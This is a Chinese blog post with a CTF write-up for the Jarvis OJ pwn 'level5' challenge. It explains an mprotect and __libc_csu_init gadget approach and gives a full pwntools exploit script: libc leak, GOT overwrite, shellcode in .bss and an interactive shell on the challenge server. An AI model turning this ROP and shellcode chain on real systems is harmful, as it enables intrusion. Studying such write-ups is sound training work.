CTF-PWN level5(Jarvis Oj)

最新推荐文章于 2022-10-20 21:00:09 发布
最新推荐文章于 2022-10-20 21:00:09 发布
阅读量817 收藏 3
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/90261270
版权

和level3_x64一样的文件,但是限制不能使用system和execv函数拿shell,但是可以用mmap和mprotect完成本题。

我尝试用mprotect来解决,首先mprotect的结构如下:

int mprotect(const void *start, size_t len, int prot);

参数的含义是:把从start开始长度为len的内存区的保护属性修改为prot指定的值,同时这个prot的值和linux的权限属性值相同

所以我们的大概思路就是:

修改.bss中内存的权限,然后将shellcode写入.bss段中执行即可。

不过具体操作起来有点小问题,因为通过ROPgadget命令可以查到pop rdi/rsi的地址,但是第三个参数rdx查不到。

这里用到了“万能GADGET”,即64位ELF文件中会有一个名叫__libc_csu_init的函数,而这个函数中会有许多我们能利用的命令

 

可以看到从0x4006aa开始便是一堆pop操作,然后在0x400690处开始把r13 r14 r15分别存入rdi rsi rdx中,然后一个call执行r12+rbx*8处的函数。并且注意到call指令之后,如果rbx和rbp刚刚好只差1,那么将继续执行回0x4006a6,我们又可以对相应寄存器进行操作。

from pwn import *
context.arch='amd64'
#p=process('./l3')
p=remote("pwn2.jarvisoj.com",9884)
libc=ELF('./libc-2.19.so')
elf=ELF('./l3')
offset=0x80
write_plt=elf.plt['write']
write_got=elf.got['write']
read_plt=elf.plt['read']
read_got=elf.got['read']
bss_addr=elf.bss()
main_addr=elf.symbols['main']
pop_rdi_ret=0x4006b3
pop_rsi_r15_ret=0x4006b1
pop_rbx_rbp_r12_r13_r14_r15_ret=0x4006aa
call_addr=0x400690

#泄露libc基地址
p.recvuntil('Input:\n')
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x1)+p64(pop_rsi_r15_ret)+p64(read_got)+'deadbeef'+p64(write_plt)+p64(main_addr)
p.send(payload)
libc.address=u64(p.recv(8))-libc.symbols["read"]#修改libc基地址
print hex(libc.address)

#把mprotect函数地址写到_libc_start_main中,之后调用_libc_start_main即为调用mprotect
p.recvuntil('Input:\n')
libc_start_main_got=elf.got['__libc_start_main']
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x0)+p64(pop_rsi_r15_ret)+p64(libc_start_main_got)+'deadbeef'+p64(read_plt)+p64(main_addr)
p.send(payload)
mprotect_addr=libc.symbols['mprotect']
print hex(mprotect_addr)
p.send(p64(mprotect_addr))

#shellcode写入.bss段内
p.recvuntil('Input:\n')
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x0)+p64(pop_rsi_r15_ret)+p64(bss_addr)+'deadbeef'+p64(read_plt)+p64(main_addr)
p.send(payload)
shellcode=asm(shellcraft.amd64.sh())
print shellcode
p.send(shellcode)

#把.bss段地址写入_gmon_start中,调用_gmon_start即为调用.bss中存入的shellcode
p.recvuntil('Input:\n')
gmon_start_got=elf.got['__gmon_start__']
payload='a'*(offset+8)+p64(pop_rdi_ret)+p64(0x0)+p64(pop_rsi_r15_ret)+p64(gmon_start_got)+'deadbeef'+p64(read_plt)+p64(main_addr)
p.send(payload)
p.send(p64(bss_addr))

#修改权限,运行shellcode
p.recvuntil('Input:\n')
payload='a'*(offset+8)+p64(pop_rbx_rbp_r12_r13_r14_r15_ret)+p64(0)+p64(1)+p64(libc_start_main_got)+p64(7)+p64(0x1000)+p64(0x600000)+p64(call_addr)
payload+='deadbeef'+p64(0)+p64(1)+p64(gmon_start_got)+p64(0)+p64(0)+p64(0)+p64(call_addr)
p.send(payload)
p.interactive()

 

SuperGate
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2034
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
ctf php 读取flag,中等难度CTF 提权获取flag 小白已经尝试的思路
weixin_39541693的博客
03-11 1221
本帖最后由 wwr2128 于 2019-3-8 09:09 编辑题目要求:在仅使用程序允许输入的情况下获取高权限shell并获取flag。(不允许使用radare2或者其他可更改程序流的软件,可以注入shellcode)已经尝试的思路:根据初步观察, 应该不属于格式化字符串的bufferoverflow类问题,且文件里面包含一个已经存在的debug function (000006c4 )(详见...
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 295
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
[XMAN]level5 Jarvis OJ
九层台
07-10 1093
思路:bss段刚开始是不可执行的,从通用的想要执行bss必须执行mprotect函数来更改bss段的权限(改为7即可读可写可执行)。但是想要获取到mprotect函数必须获取到libc版本。还是少不了上次的泄露libc函数,这里泄露的时候也直接用通用gedit减少不必要的操作,减少错误。 泄露获取libc–>获取到mprotect函数来改写bss段的权限–>把shellcode写入到...
jarvisoj pwn level5 wp
zszcr的博客
03-26 1958
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
SyntaxError: return outside function
逐梦人.的博客
10-10 1915
这种语法错误一般出现在return没有在函数内部写,而写在了函数外部或者没有定义函数的时候使用了,这种就会报错。
Javris OJ - pwn level5(mmap和mprotect练习)(_libc_csu_init中的通用gedget的使用)
hanqdi_的博客
02-14 1745
pwn level5 这个题和level3-64的附件一样,level5要求不用system和execve,而是用mprotect和mmap,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。 可以这样做:利用shellcode,利用read函数把shellcode写入bss段,这里要求写入...
level5
weixin_43697025的博客
04-11 775
level5 这个最新的学习成果。基本环境是64位的环境,与32位极大地不同在于传参,不同于32位参数位于堆栈相对固定的位置,64位的传参需要用到pop指令,将参数传入寄存器中,函数直接从寄存器中调用参数。 题目 首先IDA一下: 可以看出有read函数可以进行泄露,可以看出缓冲区大小是 80h,这是泄露的第一步。 ps:咱们进行pwn基本上都是先进行泄露,泄露出got表或plt表...
2022ISCC PWN
山高路远
07-05 1779
2022ISCC
wikiCTF-pwn-ret2csu
Oops-re的博客
10-20 402
在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。
18.9.25 Jarvis OJ PWN----[XMAN]level5
qq_42192672的博客
09-25 536
题目提示: 参考链接:https://veritas501.space/2017/03/10/JarvisOJ_WP/                   https://blog.csdn.net/github_36788573/article/details/80178146 mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完...
加密解密算法之RC4
热门推荐
BadRer的博客
04-22 1万+
参考链接:https://www.biaodianfu.com/rc4.html前言感觉RC4算法还是很常见的,特此学习下特征。 https://github.com/anthonywei/rc4 各种语言的rc4实现介绍RC4算法是一种对称加密算法,所谓对称加密,就是加密和解密的过程是一样的.c=rc4(key,m) m=rc4(key,c)这种对称性是基于密匙流加密的特征。密匙流就是说我的数据
pwn1
WYJ____的博客
05-10 1081
ls 列出文件和目录。 ls -l 列出文件的详细信息。 cat flag 显示文件flag的内容。
从BUUCTF之“jarvisoj_level5”中看如何暗度陈仓实现“mprotect”修改.bss段为可执行
Probeginner的博客
12-10 663
mprotect修改权限实践
ctfd-pwn赛题收集
最新发布
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值